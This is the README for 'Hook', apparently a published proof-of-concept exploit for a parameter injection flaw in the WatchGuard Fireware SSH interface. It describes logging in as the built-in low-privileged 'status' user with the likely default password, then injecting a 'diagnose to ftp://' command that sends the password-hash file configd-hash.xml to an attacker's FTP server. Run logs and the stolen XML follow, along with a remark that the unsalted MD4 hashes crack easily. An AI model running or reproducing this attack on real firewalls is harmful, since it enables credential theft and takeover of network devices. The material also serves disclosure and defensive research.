# Hook

Hook exploits a parameter injection vulnerability in the WatchGuard SSH interface. The vulnerability allows a low privileged user to exfiltrate arbitrary system files to an attacker controlled FTP server. Fortunately, there is a builtin low privileged user named `status` that this script defaults to. It isn't unreasonable to assume that the `status` user will use a password of `readonly`, but it isn't required.

Hook exfiltrates the user file `configd-hash.xml`. This file contains hashed user passwords. The hashes are simply unsalted MD4. [@funoverip]( [described]( using hashcat to crack the hashes in this file all the way back in 2013.

## Example Usage

albinolobster@ubuntu:~/hook$ python3 --lhost --rhost
   0101010001101000 0110010100100000 0110100001101111
   0110111101101011 0010000001100010 0111001001101001
    ,ggg,        gg                                     
   dP""Y8b       88                           ,dPYb,    
   Yb, `88       88                           IP'`Yb    
    `"  88       88                           I8  8I   
        88aaaaaaa88                           I8  8bgg, 
        88"""""""88    ,ggggg,     ,ggggg,    I8 dP" "8 
        88       88   dP"  "Y8ggg dP"  "Y8ggg I8d8bggP" 
        88       88  i8'    ,8I  i8'    ,8I   I8P' "Yb, 
        88       Y8,,d8,   ,d8' ,d8,   ,d8'  ,d8    `Yb,
        88       `Y8P"Y8888P"   P"Y8888P"    88P      Y8
   0110111001100111 0111001100100000 0111100101101111
   0111010100100000 0110001001100001 0110001101101011


[+] Spinning up FTP server thread
[I 2022-06-16 12:58:39] concurrency model: async
[I 2022-06-16 12:58:39] masquerade (NAT) address: None
[I 2022-06-16 12:58:39] passive ports: None
[I 2022-06-16 12:58:39] >>> starting FTP server on, pid=19473 <<<
diagnose to ftp://r7:1270/r7
-- WatchGuard Fireware OS Version 12.1.3.B658867
-- Support:
-- Copyright (C) 1996-2022 WatchGuard Technologies Inc.
WG>diagnose to ftp://r7:1270/r7
[I 2022-06-16 12:58:46][] FTP session opened (connect)
[I 2022-06-16 12:58:46][albinolobster] USER 'albinolobster' logged in.
[I 2022-06-16 12:58:46][albinolobster] STOR /home/albinolobster/hook/configd-hash.xml completed=1 bytes=249 seconds=0.001
[I 2022-06-16 12:58:46][albinolobster] FTP session closed (disconnect).

[!] Done
albinolobster@ubuntu:~/hook$ file configd-hash.xml 
configd-hash.xml: gzip compressed data, max speed, from Unix, original size modulo 2^32 587
albinolobster@ubuntu:~/hook$ mv configd-hash.xml configd-hash.xml.gz
albinolobster@ubuntu:~/hook$ gunzip configd-hash.xml.gz 
albinolobster@ubuntu:~/hook$ cat configd-hash.xml 
<?xml version="1.0"?>
  <user name="admin">
    <role>Device Administrator</role>
  <user name="status">
    <role>Device Monitor</role>
  <user name="wg-support">
    <role>Device Monitor</role>

## Credit

* [Blues Traveler](